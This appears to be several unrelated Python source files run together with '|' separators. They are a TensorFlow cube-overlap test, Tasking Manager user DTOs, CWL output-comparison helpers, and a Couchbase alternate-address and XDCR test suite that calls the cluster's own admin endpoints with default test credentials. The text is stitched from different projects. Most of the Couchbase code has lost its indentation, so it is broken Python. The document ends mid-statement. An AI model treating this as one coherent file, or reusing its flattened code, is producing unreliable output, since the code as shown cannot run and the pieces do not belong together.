        scale = 1
        expected = [0.003704]  # 0.1 / 27 == 0.003704
        self._VerifyValuesNew(in_z, in_q, in_t, scale, expected)

    def testForward_1(self):
        # Same geometry as testForward_0 but with a smaller scale factor.
        in_z = [[0.1, 0.1, 0.1, 0.1, 0.1, 0.1], [0.1, 0.1, 0.1, 0.1, 0.1, 0.1]]
        in_q = [[1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0], [1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0]]
        in_t = [[0.1, 0.1, 0.1, 0.1, 0.1, 0.1], [0.1, 0.1, 0.1, 0.1, 0.1, 0.1]]
        scale = 0.9
        expected = [0.013333]
        self._VerifyValuesNew(in_z, in_q, in_t, scale, expected)

    def testForward_2(self):
        # Second cube rotated (q = [0.5, 0.5, 0.5, 0.5]) and differently sized.
        in_z = [[0.1, 0.1, 0.1, 0.2, 0.3, 0.4], [0.1, 0.1, 0.1, 0.2, 0.3, 0.4]]
        in_q = [[1.0, 0.0, 0.0, 0.0, 0.5, 0.5, 0.5, 0.5], [1.0, 0.0, 0.0, 0.0, 0.5, 0.5, 0.5, 0.5]]
        in_t = [[0.1, 0.1, 0.1, 0.2, 0.3, 0.4], [0.1, 0.1, 0.1, 0.2, 0.3, 0.4]]
        scale = 1
        expected = [0.005556]
        self._VerifyValuesNew(in_z, in_q, in_t, scale, expected)

    def testForward_3(self):
        # Cubes mostly separated by translation; small residual overlap.
        in_z = [[0.1, 0.2, 0.3, 0.1, 0.2, 0.3], [0.1, 0.2, 0.3, 0.1, 0.2, 0.3]]
        in_q = [[1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0], [1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0]]
        in_t = [[0.1, 0.2, 0.3, 0.28, 0.56, 0.84], [0.1, 0.2, 0.3, 0.28, 0.56, 0.84]]
        scale = 1
        expected = [0.000741]
        self._VerifyValuesNew(in_z, in_q, in_t, scale, expected)

    def testBackward_degenerate(self):
        # Single cube: gradient of a constant-zero loss.
        in_z = [[0.1, 0.1, 0.1], [0.1, 0.1, 0.1]]
        in_q = [[1.0, 0.0, 0.0, 0.0], [1.0, 0.0, 0.0, 0.0]]
        in_t = [[0.1, 0.1, 0.1], [0.1, 0.1, 0.1]]
        scale = 1
        n_cube = 1
        batch_size = 2
        self._VerifyGradientsNew(in_z, in_q, in_t, scale, n_cube, batch_size)

    def testBackward_0(self):
        # carefully design the distance along each axis
        # when add delta, the minimal distance axis should not change
        # x axis
        in_z = [[0.1, 0.2, 0.3, 0.1, 0.2, 0.3], [0.1, 0.2, 0.3, 0.1, 0.2, 0.3]]
        in_q = [[1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0], [1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0]]
        in_t = [[0.1, 0.2, 0.3, 0.28, 0.56, 0.84], [0.1, 0.2, 0.3, 0.28, 0.56, 0.84]]
        scale = 1
        n_cube = 2
        batch_size = 2
        self._VerifyGradientsNew(in_z, in_q, in_t, scale, n_cube, batch_size)

    def testBackward_1(self):
        # carefully design the distance along each axis
        # when add delta, the minimal distance axis should not change
        # y axis
        in_z = [[0.2, 0.1, 0.3, 0.2, 0.1, 0.3], [0.2, 0.1, 0.3, 0.2, 0.1, 0.3]]
        in_q = [[1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0], [1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0]]
        in_t = [[0.2, 0.1, 0.3, 0.56, 0.28, 0.84], [0.2, 0.1, 0.3, 0.56, 0.28, 0.84]]
        scale = 1
        n_cube = 2
        batch_size = 2
        self._VerifyGradientsNew(in_z, in_q, in_t, scale, n_cube, batch_size)

    def testBackward_2(self):
        # carefully design the distance along each axis
        # when add delta, the minimal distance axis should not change
        # z axis
        in_z = [[0.3, 0.2, 0.1, 0.3, 0.2, 0.1], [0.3, 0.2, 0.1, 0.3, 0.2, 0.1]]
        in_q = [[1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0], [1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0]]
        in_t = [[0.3, 0.2, 0.1, 0.84, 0.56, 0.28], [0.3, 0.2, 0.1, 0.84, 0.56, 0.28]]
        scale = 1
        n_cube = 2
        batch_size = 2
        self._VerifyGradientsNew(in_z, in_q, in_t, scale, n_cube, batch_size)
if __name__ == '__main__':
    # Run all test cases in this module via the TensorFlow test runner.
    test.main()
|
from schematics import Model
from schematics.exceptions import ValidationError
from schematics.types import StringType, IntType, EmailType, LongType, BooleanType
from schematics.types.compound import ListType, ModelType, BaseType
from server.models.dtos.stats_dto import Pagination
from server.models.postgis.statuses import MappingLevel, UserRole
def is_known_mapping_level(value):
    """ Validates that supplied mapping level is known value """
    level_name = value.upper()
    if level_name == 'ALL':
        return True
    try:
        MappingLevel[level_name]
    except KeyError:
        raise ValidationError(f'Unknown mappingLevel: {value} Valid values are {MappingLevel.BEGINNER.name}, '
                              f'{MappingLevel.INTERMEDIATE.name}, {MappingLevel.ADVANCED.name}, ALL')
def is_known_role(value):
    """ Validates that supplied user role is known value

    :raises ValidationError: if value does not match any UserRole member
    """
    try:
        UserRole[value.upper()]
    except KeyError:
        # Bug fix: the message previously said "Unknown mappingLevel" — a
        # copy-paste from is_known_mapping_level; this validator checks roles.
        raise ValidationError(f'Unknown role: {value} Valid values are {UserRole.ADMIN.name}, '
                              f'{UserRole.PROJECT_MANAGER.name}, {UserRole.MAPPER.name}, {UserRole.VALIDATOR.name}')
class UserDTO(Model):
    """ DTO for User """
    validation_message = BooleanType(default=True)
    id = LongType()
    username = StringType()
    role = StringType()
    mapping_level = StringType(serialized_name='mappingLevel', validators=[is_known_mapping_level])
    tasks_mapped = IntType(serialized_name='tasksMapped')
    tasks_validated = IntType(serialized_name='tasksValidated')
    tasks_invalidated = IntType(serialized_name='tasksInvalidated')
    email_address = EmailType(serialized_name='emailAddress', serialize_when_none=False)
    # Bug fix: this flag was declared as EmailType; it is a boolean
    # ("isEmailVerified"), so validation/serialization used the wrong type.
    is_email_verified = BooleanType(serialized_name='isEmailVerified', serialize_when_none=False)
    twitter_id = StringType(serialized_name='twitterId')
    facebook_id = StringType(serialized_name='facebookId')
    linkedin_id = StringType(serialized_name='linkedinId')
class UserStatsDTO(Model):
    """ DTO containing statistics about the user """
    # Total time spent mapping; serialized as `timeSpentMapping`.
    time_spent_mapping = IntType(serialized_name='timeSpentMapping')
class UserOSMDTO(Model):
    """ DTO containing OSM details for the user """
    # OSM account creation timestamp, kept as the string the OSM API returns.
    account_created = StringType(required=True, serialized_name='accountCreated')
    # Number of changesets the user has submitted on OSM.
    changeset_count = IntType(required=True, serialized_name='changesetCount')
class MappedProject(Model):
    """ Describes a single project a user has mapped """
    project_id = IntType(serialized_name='projectId')
    name = StringType()
    tasks_mapped = IntType(serialized_name='tasksMapped')
    tasks_validated = IntType(serialized_name='tasksValidated')
    status = StringType()
    # Geometry payloads; BaseType leaves them unvalidated pass-through values.
    centroid = BaseType()
    aoi = BaseType()
class UserMappedProjectsDTO(Model):
    """ DTO for projects a user has mapped """
    def __init__(self):
        """Initialise with an empty list so callers can append projects."""
        super().__init__()
        self.mapped_projects = []

    mapped_projects = ListType(ModelType(MappedProject), serialized_name='mappedProjects')
class UserSearchQuery(Model):
    """ Describes a user search query, that a user may submit to filter the list of users """
    username = StringType()
    role = StringType(validators=[is_known_role])
    mapping_level = StringType(serialized_name='mappingLevel', validators=[is_known_mapping_level])
    page = IntType()

    def __hash__(self):
        """ Make object hashable so we can cache user searches"""
        # NOTE(review): hashing is value-based but no __eq__ is defined here;
        # cache lookups also need matching equality semantics — confirm the
        # schematics Model base provides them, otherwise identical queries
        # never compare equal and the cache always misses.
        return hash((self.username, self.role, self.mapping_level, self.page))
class ListedUser(Model):
    """ Describes a user within the User List """
    id = LongType()
    username = StringType()
    role = StringType()
    mapping_level = StringType(serialized_name='mappingLevel')
class UserSearchDTO(Model):
    """ Paginated list of TM users """
    def __init__(self):
        """Initialise with an empty user list so callers can append."""
        super().__init__()
        self.users = []

    pagination = ModelType(Pagination)
    users = ListType(ModelType(ListedUser))
class UserFilterDTO(Model):
    """ DTO to hold all Tasking Manager users """
    def __init__(self):
        """Initialise with an empty username list so callers can append."""
        super().__init__()
        self.usernames = []

    pagination = ModelType(Pagination)
    usernames = ListType(StringType)
|
<gh_stars>10-100
import json
from typing import Any, Dict, List, Optional, Set, Text
import junit_xml
REQUIRED = "required"
class TestResult:
    """Encapsulate relevant test result data."""

    def __init__(
        self,
        return_code,
        standard_output,
        error_output,
        duration,
        classname,
        message="",
    ):
        # type: (int, Text, Text, float, Text, str) -> None
        self.return_code, self.message = return_code, message
        self.standard_output, self.error_output = standard_output, error_output
        self.duration, self.classname = duration, classname

    def create_test_case(self, test):
        # type: (Dict[Text, Any]) -> junit_xml.TestCase
        """Build a junit_xml.TestCase from this result and the test metadata."""
        doc = test.get("doc", "N/A").strip()
        tags = test.get("tags")
        category = ", ".join(test["tags"]) if tags else REQUIRED
        case = junit_xml.TestCase(
            doc,
            elapsed_sec=self.duration,
            file=test.get("short_name"),
            category=category,
            stdout=self.standard_output,
            stderr=self.error_output,
        )
        # A non-zero return code marks the case as failed.
        if self.return_code > 0:
            case.failure_message = self.message
        return case
class CompareFail(Exception):
    """Raised when an expected and an actual output do not match."""

    @classmethod
    def format(cls, expected, actual, cause=None):
        # type: (Any, Any, Any) -> CompareFail
        """Build a CompareFail whose message shows both sides (and a cause)."""
        expected_json = json.dumps(expected, indent=4, sort_keys=True)
        actual_json = json.dumps(actual, indent=4, sort_keys=True)
        message = f"expected: {expected_json}\ngot: {actual_json}"
        if cause:
            message += f"\ncaused by: {cause}"
        return cls(message)
def compare_location(expected, actual):
    # type: (Dict[str,Any], Dict[str,Any]) -> None
    """Check that actual's path/location ends with the expected suffix."""
    if "path" in expected:
        comp = "path"
        if comp not in actual:
            # Fall back to the URI-style location when no path is present.
            actual[comp] = actual["location"]
    elif "location" in expected:
        comp = "location"
    else:
        return
    if actual.get("class") == "Directory":
        # Normalise directory locations before suffix comparison.
        actual[comp] = actual[comp].rstrip("/")
    want = expected[comp]
    got = actual[comp]
    if want == "Any":
        return
    suffix_match = got.endswith("/" + want) or ("/" not in got and want == got)
    if not suffix_match:
        raise CompareFail.format(
            expected,
            actual,
            f"{got} does not end with {want}",
        )
def compare_contents(expected, actual):
    # type: (Dict[str,Any], Dict[str,Any]) -> None
    """Compare the expected literal contents against the actual file on disk."""
    expected_contents = expected["contents"]
    with open(actual["path"]) as handle:
        actual_contents = handle.read()
    if actual_contents == expected_contents:
        return
    detail = json.dumps(
        "Output file contents do not match: actual '%s' is not equal to expected '%s'"
        % (actual_contents, expected_contents)
    )
    raise CompareFail.format(expected, actual, detail)
def check_keys(keys, expected, actual):
    # type: (Set[str], Dict[str,Any], Dict[str,Any]) -> None
    """Compare expected vs actual for each key, adding context on failure."""
    for key in keys:
        try:
            compare(expected.get(key), actual.get(key))
        except CompareFail as err:
            raise CompareFail.format(
                expected, actual, f"field '{key}' failed comparison: {str(err)}"
            ) from err
def compare_file(expected, actual):
    # type: (Dict[str,Any], Dict[str,Any]) -> None
    """Compare a File object: location, optional contents, then other keys."""
    compare_location(expected, actual)
    if "contents" in expected:
        compare_contents(expected, actual)
    handled = {"path", "location", "listing", "contents"}
    check_keys(set(expected) - handled, expected, actual)
def compare_directory(expected, actual):
    # type: (Dict[str,Any], Dict[str,Any]) -> None
    """Compare a Directory object and require every expected listing entry."""
    if actual.get("class") != "Directory":
        raise CompareFail.format(
            expected, actual, "expected object with a class 'Directory'"
        )
    if "listing" not in actual:
        raise CompareFail.format(
            expected, actual, "'listing' is mandatory field in Directory object"
        )
    for wanted in expected["listing"]:
        # Each expected entry must match at least one actual entry.
        for candidate in actual["listing"]:
            try:
                compare(wanted, candidate)
                break
            except CompareFail:
                continue
        else:
            raise CompareFail.format(
                expected,
                actual,
                "%s not found" % json.dumps(wanted, indent=4, sort_keys=True),
            )
    compare_file(expected, actual)
def compare_dict(expected, actual):
    # type: (Dict[str,Any], Dict[str,Any]) -> None
    """Compare dicts key by key; reject unexpected non-null extra keys."""
    for key in expected:
        try:
            compare(expected[key], actual.get(key))
        except CompareFail as err:
            raise CompareFail.format(
                expected, actual, f"failed comparison for key '{key}': {err}"
            ) from err
    for extra in set(actual) - set(expected):
        if actual[extra] is not None:
            raise CompareFail.format(expected, actual, "unexpected key '%s'" % extra)
def compare(expected, actual):  # type: (Any, Any) -> None
    """Recursively compare expected against actual; raise CompareFail on mismatch.

    The literal string "Any" matches anything.
    """
    if expected == "Any":
        return
    if expected is not None and actual is None:
        raise CompareFail.format(expected, actual)
    try:
        if isinstance(expected, dict):
            if not isinstance(actual, dict):
                raise CompareFail.format(expected, actual)
            klass = expected.get("class")
            if klass == "File":
                compare_file(expected, actual)
            elif klass == "Directory":
                compare_directory(expected, actual)
            else:
                compare_dict(expected, actual)
        elif isinstance(expected, list):
            if not isinstance(actual, list):
                raise CompareFail.format(expected, actual)
            if len(expected) != len(actual):
                raise CompareFail.format(expected, actual, "lengths don't match")
            for idx, item in enumerate(expected):
                try:
                    compare(item, actual[idx])
                except CompareFail as err:
                    raise CompareFail.format(expected, actual, err) from err
        elif expected != actual:
            raise CompareFail.format(expected, actual)
    except Exception as err:
        # Any error (including a CompareFail from above) surfaces uniformly.
        raise CompareFail(str(err)) from err
def get_test_number_by_key(tests, key, value):
    # type: (List[Dict[str, str]], str, str) -> Optional[int]
    """Return the index of the first test whose `key` equals `value`, else None."""
    matches = (
        idx
        for idx, entry in enumerate(tests)
        if key in entry and entry[key] == value
    )
    return next(matches, None)
|
import copy
import json, ast, filecmp, itertools
import os, shutil, ast
from threading import Thread
from subprocess import Popen, PIPE, check_output, STDOUT, CalledProcessError
from TestInput import TestInputSingleton, TestInputServer
from alternate_address.alternate_address_base import AltAddrBaseTest
from membase.api.rest_client import RestConnection, RestHelper
from couchbase_helper.cluster import Cluster
from remote.remote_util import RemoteMachineShellConnection
from membase.helper.bucket_helper import BucketOperationHelper
from membase.helper.cluster_helper import ClusterOperationHelper
from couchbase_helper.documentgenerator import BlobGenerator, JsonDocGenerator
from pprint import pprint
from testconstants import CLI_COMMANDS, LINUX_COUCHBASE_BIN_PATH,\
WIN_COUCHBASE_BIN_PATH, COUCHBASE_FROM_MAD_HATTER,\
WIN_TMP_PATH_RAW
class AlternateAddressTests(AltAddrBaseTest):
def setUp(self):
for server in TestInputSingleton.input.servers:
remote = RemoteMachineShellConnection(server)
remote.enable_diag_eval_on_non_local_hosts()
remote.disconnect()
super(AlternateAddressTests, self).setUp()
self.remove_all_alternate_address_settings()
self.cluster_helper = Cluster()
self.ex_path = self.tmp_path + "export{0}/".format(self.master.ip)
self.num_items = self.input.param("items", 1000)
self.client_os = self.input.param("client_os", "linux")
self.localhost = self.input.param("localhost", False)
self.json_create_gen = JsonDocGenerator("altaddr", op_type="create",
encoding="utf-8", start=0, end=self.num_items)
self.json_delete_gen = JsonDocGenerator("imex", op_type="delete",
encoding="utf-8", start=0, end=self.num_items)
def tearDown(self):
try:
super(AlternateAddressTests, self).tearDown()
except Exception as e:
print e
BucketOperationHelper.delete_all_buckets_or_assert(self.servers, self)
ClusterOperationHelper.cleanup_cluster(self.servers, self.servers[0])
def test_setting_alternate_address(self):
server1 = self.servers[0]
url_format = ""
secure_port = ""
secure_conn = ""
self.skip_set_alt_addr = False
shell = RemoteMachineShellConnection(server1)
if self.secure_conn:
cacert = self.get_cluster_certificate_info(server1)
secure_port = "1"
url_format = "s"
if not self.no_cacert:
secure_conn = "--cacert {0}".format(cacert)
if self.no_ssl_verify:
secure_conn = "--no-ssl-verify"
output = self.list_alt_address(server=server1, url_format = url_format,
secure_port = secure_port, secure_conn = secure_conn)
if output:
output, _ = self.remove_alt_address_setting(server=server1,
url_format = url_format,
secure_port = secure_port,
secure_conn = secure_conn)
mesg = 'SUCCESS: Alternate address configuration deleted'
if not self._check_output(mesg, output):
self.fail("Fail to remove alternate address")
output = self.list_alt_address(server=server1, url_format = url_format,
secure_port = secure_port,
secure_conn = secure_conn)
if output and output[0] != "[]":
self.fail("Fail to remove alternate address with remove command")
self.log.info("Start to set alternate address")
internal_IP = self.get_internal_IP(server1)
setting_cmd = "{0}couchbase-cli{1} {2}"\
.format(self.cli_command_path, self.cmd_ext,
"setting-alternate-address")
setting_cmd += " -c http{0}://{1}:{2}{3} --username {4} --password {5} {6}"\
.format(url_format, internal_IP , secure_port, server1.port,
server1.rest_username, server1.rest_password, secure_conn)
setting_cmd = setting_cmd + "--set --hostname {0} ".format(server1.ip)
shell.execute_command(setting_cmd)
output = self.list_alt_address(server=server1, url_format = url_format,
secure_port = secure_port,
secure_conn = secure_conn)
if output and output[0]:
output = output[0]
output = output[1:-1]
output = ast.literal_eval(output)
if output["hostname"] != server1.ip:
self.fail("Fail to set correct hostname")
else:
self.fail("Fail to set alternate address")
self.log.info("Start to add node to cluster use internal IP")
services_in = self.alt_addr_services_in
if "-" in services_in:
set_services = services_in.split("-")
else:
set_services = services_in.split(",")
i = 0
num_hostname_add = 1
for server in self.servers[1:]:
add_node_IP = self.get_internal_IP(server)
node_services = "kv"
if len(set_services) == 1:
node_services = set_services[0]
elif len(set_services) > 1:
if len(set_services) == len(self.servers[1:]):
node_services = set_services[i]
i += 1
if self.add_hostname_node and num_hostname_add <= self.num_hostname_add:
add_node_IP = server.ip
num_hostname_add += 1
try:
shell.alt_addr_add_node(main_server=server1, internal_IP=add_node_IP,
server_add=server, services=node_services,
cmd_ext=self.cmd_ext)
except Exception as e:
if e:
self.fail("Error: {0}".format(e))
rest = RestConnection(self.master)
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()], ejectedNodes=[])
rest.monitorRebalance()
self.log.info("Create default bucket")
self._create_default_bucket(self.master)
buckets = rest.get_buckets()
status = RestHelper(rest).vbucket_map_ready(buckets[0].name)
if not status:
self.fail("Failed to create bucket.")
if self.run_alt_addr_loader:
if self.alt_addr_kv_loader:
self.kv_loader(server1, client_os = self.client_os)
if self.alt_addr_n1ql_query:
self.n1ql_query(server1.ip, self.client_os,
create_travel_sample_bucket=True)
if self.alt_addr_eventing_function:
self.create_eventing_function(server1, self.client_os,
create_travel_sample_bucket=True)
self.skip_set_alt_addr = True
alt_addr_status = []
if not self.skip_set_alt_addr:
for server in self.servers[1:]:
internal_IP = self.get_internal_IP(server)
status = self.set_alternate_address(server, url_format = url_format,
secure_port = secure_port, secure_conn = secure_conn,
internal_IP = internal_IP)
alt_addr_status.append(status)
if False in alt_addr_status:
self.fail("Fail to set alt address")
else:
self.all_alt_addr_set = True
if self.run_alt_addr_loader:
if self.alt_addr_kv_loader:
self.kv_loader(server1, self.client_os)
if self.alt_addr_n1ql_query:
self.n1ql_query(server1.ip, self.client_os)
remove_node = ""
if self.alt_addr_rebalance_out:
internal_IP = self.get_internal_IP(self.servers[-1])
reject_node = "ns_1@{0}".format(internal_IP)
self.log.info("Rebalance out a node {0}".format(internal_IP))
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()],\
ejectedNodes=[reject_node])
reb_status = rest.monitorRebalance()
self.assertTrue(reb_status, "Rebalance out node {0} failed".format(internal_IP))
remove_node = internal_IP
if self.alt_addr_rebalance_in and self.alt_addr_rebalance_out:
if remove_node:
free_node = remove_node
if self.add_hostname_node:
free_node = self.get_external_IP(remove_node)
cmd = 'curl -X POST -d "hostname={0}&user={1}&password={2}&services={3}" '\
.format(free_node, server1.rest_username, server1.rest_password,
self.alt_addr_rebalance_in_services)
cmd += '-u Administrator:password http://{0}:8091/controller/addNode'\
.format(server1.ip)
shell.execute_command(cmd)
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()],\
ejectedNodes=[])
reb_status = rest.monitorRebalance()
self.assertTrue(reb_status, "Rebalance back in failed")
status = self.set_alternate_address(self.servers[-1], url_format = url_format,
secure_port = secure_port,
secure_conn = secure_conn,
internal_IP = free_node)
if status:
self.all_alt_addr_set = True
else:
self.all_alt_addr_set = False
else:
self.fail("We need a free node to add to cluster")
if self.run_alt_addr_loader:
if self.alt_addr_kv_loader:
self.kv_loader(server1, self.client_os)
if self.alt_addr_n1ql_query:
self.n1ql_query(server1.ip, self.client_os)
status = self.remove_all_alternate_address_settings()
if not status:
self.fail("Failed to remove all alternate address setting")
    def test_alt_addr_with_xdcr(self):
        """Verify XDCR behaviour with alternate addresses.

        Sets alternate addresses on the source cluster only, confirms the
        replication times out while the destination has none, then sets the
        destination's alternate addresses, restarts the replication, and
        verifies the docs arrive.
        """
        url_format = ""
        secure_port = ""
        secure_conn = ""
        self.setup_xdcr_cluster()
        des_alt_addr_set = False
        self.log.info("Create bucket at source")
        src_master = self.clusters_dic[0][0]
        self._create_buckets(src_master)
        src_rest = RestConnection(src_master)
        src_buckets = src_rest.get_buckets()
        if src_buckets and src_buckets[0]:
            src_bucket_name = src_buckets[0].name
        else:
            self.fail("Failed to create bucket at src cluster")
        des_master = self.clusters_dic[1][0]
        self.log.info("Create bucket at destination")
        self._create_buckets(des_master)
        des_rest = RestConnection(des_master)
        des_buckets = des_rest.get_buckets()
        if des_buckets and des_buckets[0]:
            des_bucket_name = des_buckets[0].name
        else:
            self.fail("Failed to create bucket at des cluster")
        # Set alternate addresses on the SOURCE cluster only for now.
        for server in self.clusters_dic[0]:
            internal_IP = self.get_internal_IP(server)
            status = self.set_alternate_address(server, url_format = url_format,
                                                secure_port = secure_port, secure_conn = secure_conn,
                                                internal_IP = internal_IP)
        self.all_alt_addr_set = True
        self.kv_loader(src_master, "mac")
        self.create_xdcr_reference(src_master.ip, des_master.ip)
        src_num_docs = int(src_rest.get_active_key_count(src_bucket_name))
        count = 0
        # NOTE(review): this read duplicates the one two lines above.
        src_num_docs = int(src_rest.get_active_key_count(src_bucket_name))
        while count < 10:
            if src_num_docs < 10000:
                self.sleep(10, "wait for items written to bucket")
                src_num_docs = int(src_rest.get_active_key_count(src_bucket_name))
                count += 1
            if src_num_docs == 10000:
                self.log.info("all bucket items set")
                break
            # NOTE(review): fails after 2 iterations (~20s) although the loop
            # bound is 10 and the message says 30 seconds — confirm intent.
            if count == 2:
                self.fail("bucket items does not set after 30 seconds")
        self.create_xdcr_replication(src_master.ip, des_master.ip, src_bucket_name)
        self.sleep(25, "time needed for replication to be created")
        self.log.info("Reduce check point time to 30 seconds")
        self.set_xdcr_checkpoint(src_master.ip, 30)
        #self.set_xdcr_checkpoint(des_master.ip, 30)
        self.log.info("Get xdcr configs from cluster")
        shell = RemoteMachineShellConnection(self.master)
        rep_id_cmd = "curl -u Administrator:password http://{0}:8091/pools/default/remoteClusters"\
                     .format(self.master.ip)
        output, error = shell.execute_command(rep_id_cmd)
        # Strip the surrounding JSON array brackets before parsing.
        output = output[0][1:-1]
        xdcr_config = json.loads(output)
        cmd = "curl -u Administrator:password http://localhost:8091/sasl_logs/goxdcr "
        cmd += "| grep 'Execution timed out' | tail -n 1 "
        output, error = shell.execute_command(cmd)
        self.log.info("Verify replication timeout due to alt addr does not enable at des cluster")
        if xdcr_config["uuid"] in output[0] and "Execution timed out" in output[0]:
            self.log.info("replication failed as expected as alt addr does not enable at des")
        else:
            self.fail("Alt addr failed to disable at des cluster")
        count = 0
        des_num_docs = int(des_rest.get_active_key_count(des_bucket_name))
        while count < 6:
            if src_num_docs != des_num_docs:
                self.sleep(60, "wait for replication ...")
                des_num_docs = int(des_rest.get_active_key_count(des_bucket_name))
                count += 1
            elif src_num_docs == des_num_docs:
                # Docs replicated even though the destination has no alternate
                # address configured — that is a failure for this scenario.
                self.fail("Replication should fail. Alt addr at des does not block")
                break
        if count == 6:
            if not des_alt_addr_set:
                self.log.info("This is expected since alt addr is not set yet")
                des_alt_addr_status =[]
                for server in self.clusters_dic[1]:
                    internal_IP = self.get_internal_IP(server)
                    des_alt_addr_status.append(self.set_alternate_address(server, url_format = url_format,
                                               secure_port = secure_port, secure_conn = secure_conn,
                                               internal_IP = internal_IP))
                if False in des_alt_addr_status:
                    self.fail("Failed to set alt addr at des cluster")
                else:
                    des_alt_addr_set = True
                    count = 0
        self.log.info("Restart replication")
        cmd = "curl -X POST -u Administrator:password "
        cmd += "http://{0}:8091/settings/replications/{1}%2F{2}%2F{2} "\
               .format(self.master.ip, xdcr_config["uuid"], des_bucket_name)
        cmd += "-d pauseRequested="
        try:
            # Pause, wait, then resume to force the replication to restart.
            check_output(cmd + "true", shell=True, stderr=STDOUT)
            self.sleep(20)
            check_output(cmd + "false", shell=True, stderr=STDOUT)
        except CalledProcessError as e:
            print("Error return code: {0}".format(e.returncode))
            if e.output:
                self.fail(e.output)
        des_rest = RestConnection(des_master)
        self.log.info("Verify docs is replicated to des cluster")
        while count < 6:
            if src_num_docs != des_num_docs:
                self.sleep(60, "wait for replication start...")
                des_num_docs = int(des_rest.get_active_key_count(des_bucket_name))
                count += 1
            elif src_num_docs == des_num_docs:
                self.log.info("Replication is complete")
                break
        if count == 6:
            if des_alt_addr_set:
                self.fail("Replication does not complete after 6 minutes")
        self.delete_xdcr_replication(src_master.ip, xdcr_config["uuid"])
def remove_all_alternate_address_settings(self):
self.log.info("Remove alternate address setting in each node")
remove_alt = []
for server in self.servers:
shell = RemoteMachineShellConnection(server)
cmd = "{0}couchbase-cli{1} {2} -c {3}:{4} --username {5} --password {6} {7}"\
.format(self.cli_command_path, self.cmd_ext,
"setting-alternate-address", server.ip,
server.port, server.rest_username, server.rest_password,
"--remove")
output, error = shell.execute_command(cmd, debug=True)
if error:
remove_alt.append(error)
shell.disconnect()
if remove_alt:
self.log.error("Remove alt address failed: {0}".format(remove_alt))
return False
else:
return True
def remove_alt_address_setting(self, server=None, url_format = "", secure_port = "",
secure_conn = ""):
sub_command = "setting-alternate-address"
if server is None:
server = self.master
cmd = "{0}couchbase-cli{1} {2} -c http{3}://{4}:{5}{6} --username {7} --password {8} {9}"\
.format(self.cli_command_path, self.cmd_ext,
sub_command, url_format, server.ip, secure_port,
server.port, server.rest_username, server.rest_password,
secure_conn)
remove_cmd = cmd + " --remove"
shell = RemoteMachineShellConnection(server)
output, error = shell.execute_command(remove_cmd)
shell.disconnect()
return output, error
def list_alt_address(self, server=None, url_format = "", secure_port = "", secure_conn = ""):
sub_command = "setting-alternate-address"
if server is None:
server = self.master
cmd = "{0}couchbase-cli{1} {2} -c http{3}://{4}:{5}{6} --username {7} --password {8} {9}"\
.format(self.cli_command_path, self.cmd_ext,
sub_command, url_format, server.ip, secure_port,
server.port, server.rest_username, server.rest_password,
secure_conn)
list_cmd = cmd + " --list"
shell = RemoteMachineShellConnection(server)
output, error = shell.execute_command(list_cmd)
shell.disconnect()
return output
def set_alternate_address(self, server=None, url_format = "", secure_port = "",
secure_conn = "", internal_IP = ""):
self.log.info("Start to set alternate address")
if server is None:
server = self.master
shell = RemoteMachineShellConnection(server)
internal_IP = self.get_internal_IP(server)
setting_cmd = "{0}couchbase-cli{1} {2}"\
.format(self.cli_command_path, self.cmd_ext,
"setting-alternate-address")
setting_cmd += " -c http{0}://{1}:{2}{3} --username {4} --password {5} {6}"\
.format(url_format, internal_IP , secure_port, server.port,
server.rest_username, server.rest_password, secure_conn)
setting_cmd = setting_cmd + "--set --hostname {0} ".format(server.ip)
shell.execute_command(setting_cmd)
output = self.list_alt_address(server=server, url_format = url_format,
secure_port = secure_port,
secure_conn = secure_conn)
if output:
return True
else:
return False
def get_cluster_certificate_info(self, server):
    """Dump the cluster CA certificate to a local cert.pem and return its path.

    Runs "couchbase-cli ssl-manage --cluster-cert-info" with stdout
    redirected into cert.pem (under root_path, or the Windows temp path).
    Fails the test when the CLI reports an error.

    Bug fix: the shell connection used to leak when self.fail() was hit;
    it is now always disconnected before the error check.
    """
    cert_file_location = self.root_path + "cert.pem"
    if self.os == "windows":
        cert_file_location = WIN_TMP_PATH_RAW + "cert.pem"
    shell = RemoteMachineShellConnection(server)
    try:
        cmd = "{0}couchbase-cli{1} ssl-manage "\
            .format(self.cli_command_path, self.cmd_ext)
        cmd += "-c {0}:{1} -u Administrator -p password --cluster-cert-info > {2}"\
            .format(server.ip, server.port,
                    cert_file_location)
        output, _ = shell.execute_command(cmd)
    finally:
        shell.disconnect()
    if output and "Error" in output[0]:
        self.fail("Failed to get CA certificate from cluster.")
    return cert_file_location
def kv_loader(self, server = None, client_os = "linux"):
    """Load documents into the first bucket using the local cbworkloadgen,
    to verify that the cluster is reachable through its alternate address.

    :param server: target cluster node; defaults to self.master.
    :param client_os: "linux" or "mac" -- selects the local binary path.
    """
    if server is None:
        server = self.master
    buckets = RestConnection(server).get_buckets()
    base_path = "/opt/couchbase/bin/"
    if client_os == "mac":
        base_path = "/Applications/Couchbase\ Server.app/Contents/Resources/couchbase-core/bin/"
    loader_path = "{0}cbworkloadgen{1}".format(base_path, self.cmd_ext)
    # Load JSON docs (-j) into the first bucket returned by REST.
    cmd_load = " -n {0}:8091 -u Administrator -p password -j -b {1}"\
        .format(server.ip, buckets[0].name)
    error_mesg = "No alternate address information found"  # NOTE(review): unused local
    try:
        self.log.info("Load kv doc to bucket from outside network")
        output = check_output("{0} {1}".format(loader_path, cmd_load), shell=True, stderr=STDOUT)
        if output:
            self.log.info("Output from kv loader: {0}".format(output))
    except CalledProcessError as e:
        # Python 2 print statement -- this module predates Python 3.
        print "Error return code: ", e.returncode
        if e.output:
            if self.all_alt_addr_set:
                # Alternate addresses are configured, so any failure here
                # is a genuine test failure.
                if "No alternate address information found" in e.output:
                    self.fail("Failed to set alternate address.")
                else:
                    self.fail("Failed to load to remote cluster.{0}"\
